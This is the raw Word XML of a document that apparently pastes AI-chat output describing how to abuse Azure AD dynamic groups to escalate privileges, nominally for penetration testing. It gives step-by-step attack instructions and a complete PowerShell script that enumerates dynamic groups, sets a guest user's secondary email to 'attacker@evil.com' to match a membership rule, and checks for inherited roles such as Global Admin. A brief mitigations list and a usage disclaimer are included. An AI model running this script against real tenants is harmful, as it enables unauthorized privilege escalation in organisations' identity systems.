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7739" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D174B0" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C765982" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23549457" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECB8559" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc226381638"/>
      <w:r>
        <w:t>Dynamic group abuse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="60C7ACED" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6741FB34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 xml:space="preserve">Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>summarized, corrected, and rewritten</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of the process for </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>abusing Azure AD Dynamic Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the context of an </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure penetration test</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694EE470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3BF9A235">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E81C5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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacking Azure: Dynamic Group Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E51750" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Overview:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Azure AD Dynamic Groups automatically add or remove users based on rules (e.g., email domain, attributes). If misconfigured, these can be abused—especially through </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>malicious guest invitations</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>—to escalate privileges or gain broader access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BC5379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72D0980D">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB02A6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🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34019543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1. Enumerate Dynamic Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC80807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Use AzureAD or AzureADPreview module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8C279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Import-Module AzureADPreview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13794BD7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Connect-AzureAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F2D34" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71560346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# List all dynamic groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC8770A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Get-AzureADMSGroup | Where-Object { $_.GroupTypes -contains "DynamicMembership" } | Format-Table DisplayName, Id, MembershipRule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B6F9C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476631E5">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14457743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2. Analyze Membership Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FCF2AC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In the Azure Portal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF68634" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4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 xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure AD → Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05874AF1" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4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>Identify dynamic groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3252AF0E" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Open a group → Check “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Dynamic Membership Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29128C12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Example: A rule like user.otherMails -contains "@evil.com" could be abused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47945C2A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3694EBBE">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A097FE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3. Invite a Malicious Guest User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F3B1DC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In Azure Portal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FAFC72" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4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 xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure AD → Users → New Guest User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B36BBE" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4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>Fill out and submit the invitation form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1839390F" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4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>After submission, resend the invite and copy the new URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664EB08A" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the link in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Incognito</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode, sign in, and accept the invitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D791E5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0A24B1CB">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004F062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4. Modify Guest Attributes to Match Rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886B28C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Now modify the guest account to match the group’s dynamic rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C819E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# Set a secondary email (e.g., to match a rule like "otherMails -contains '@evil.com'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8585A8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Set-AzureADUser -ObjectId &lt;GUEST_OBJECT_ID&gt; -OtherMails @("attacker@evil.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76655039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3CC55D16">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C3A4E0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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>5. Wait for Propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798FD1E" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4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>Azure AD may take a few minutes to apply changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63333646" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Then confirm group membership:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5F51F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Get-AzureADGroupMember -ObjectId &lt;DYNAMIC_GROUP_OBJECT_ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658969FF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7A90F280">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B43D44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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F4D8C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 xml:space="preserve">If the dynamic group grants </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>privileged access (e.g., Global Admin, App Admin, Intune Role)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the attacker now inherits those roles </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>automatically and silently</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> just by matching the group rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6EA04B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lastRenderedPageBreak/>
        <w:pict w14:anchorId="25B40CB7">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35082C12" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158F8BAE" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4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>Avoid using user-controllable attributes in dynamic membership rules (like user.otherMails)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE3D38" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4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>Restrict guest user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AF7139" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Use conditional access and entitlement management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6997766A" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="075897D5">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A6B11F" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="00A64A53" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Would you like an automated PowerShell script version of this attack flow?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5F2AF" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339C30AA" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A03C4CD" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc226381639"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4DA1942F" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ABEB341" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10EF98D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Here is an </w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>automated PowerShell script</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that demonstrates the </w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>abuse of Azure AD Dynamic Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a penetration testing context. This script assumes the attacker already has guest invite permissions and access to the AzureADPreview module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C70383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6CC58790">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE9427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⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DISCLAIMER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E674A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Use this script </w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>only in authorized environments</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for security testing or red teaming. Misuse can result in legal consequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54163EBA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70EEA090">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74713C69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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell Script: Dynamic Group Abuse in Azure AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372775FE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Load AzureADPreview Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE64FD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Import-Module AzureADPreview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4191B848" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E577F9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Connect to Azure AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC6B11A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Connect-AzureAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8505D7" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3DE95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1: Enumerate Dynamic Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C849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Write-Host "`n[+] Enumerating Dynamic Membership Groups..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE78F9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$dynGroups = Get-AzureADMSGroup | Where-Object { $_.GroupTypes -contains "DynamicMembership" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C5B9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$dynGroups | Format-Table DisplayName, Id, MembershipRule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD176B5" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C3DDF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2: Manually invite guest via Portal and get ObjectId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622708E5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Replace with real Object ID from invited user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D33ED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$guestObjectId = "&lt;REPLACE_WITH_GUEST_OBJECT_ID&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0DD2CE" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5CFC2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3: Modify 'OtherMails' to match dynamic rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4263C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Write-Host "`n[+] Setting secondary email to trigger dynamic rule..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA633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Set-AzureADUser -ObjectId $guestObjectId -OtherMails @("attacker@evil.com") -Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBD2F57" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACDE7D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4: Wait for dynamic group sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843BE4F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Write-Host "`n[+] Waiting 2-5 minutes for dynamic group processing..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E88DB3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Start-Sleep -Seconds 180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69910449" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5E52E3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5: Check group membership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9EBDA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foreach ($group in $dynGroups) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DEC527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$members = Get-AzureADGroupMember -ObjectId $group.Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E2B0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if ($members.ObjectId -contains $guestObjectId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75059EC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    Write-Host "[+] SUCCESS: Guest user is a member of dynamic group '$($group.DisplayName)'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9466E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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFFD9D4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    Write-Host "[-] Guest not yet added to '$($group.DisplayName)'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55547B32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  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25071D8F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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D05BC1C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0D929AE5">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E4AC1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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test Lab Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5673A7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To safely test this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729FA795" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Set up a dynamic group in Azure AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ECE567" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Use a rule like user.otherMails -contains "@evil.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28299E60" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Invite a guest with that email pattern</w:t>
      </w:r>
    </w:p>
